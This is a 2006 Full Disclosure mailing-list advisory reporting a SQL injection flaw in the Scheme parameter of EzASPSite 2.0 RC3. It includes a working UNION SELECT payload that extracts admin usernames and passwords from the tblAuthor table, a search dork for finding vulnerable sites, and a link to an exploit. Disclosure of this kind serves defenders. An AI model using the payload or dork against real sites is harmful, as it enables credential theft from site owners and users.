Full Disclosure mailing list archives
EzASPSite <= 2.0 RC3 Remote SQL Injection Exploit Vulnerability.
From: "Mustafa Can Bjorn IPEKCI" <nukedx () nukedx com>
Date: Wed, 29 Mar 2006 22:57:50 +0300
--Security Report-- Advisory: EzASPSite <= 2.0 RC3 Remote SQL Injection Exploit Vulnerability. --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 29/03/06 21:33 PM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx () nukedx com Web: http://www.nukedx.com } --- Vendor: EzASPSite (http://www.ezaspsite.com) Version: 2.0 RC3 and prior versions must be affected. About: Via this method remote attacker can inject arbitrary SQL queries to Scheme parameter in Default.asp Level: Critical --- How&Example: GET -> http://[victim]/[EZASPDir]/Default.asp?Scheme=[SQL] EXAMPLE -> http://[victim]/[EZASPDir]/Default.asp?Scheme=-1+UNION+SELECT+0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,'NWPX', 0,0,0,0,0,0,0+from+tblAuthor+where+Group_ID=1 with this examples remote attacker can leak speficied users login information from database. --- Timeline: * 29/03/2006: Vulnerability found. * 29/03/2006: Contacted with vendor and waiting reply. --- Exploit: http://www.nukedx.com/?getxpl=22 --- Dorks: "Powered By EzASPSite v2.0 RC3" --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=22 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- EzASPSite <= 2.0 RC3 Remote SQL Injection Exploit Vulnerability. Mustafa Can Bjorn IPEKCI (Mar 29)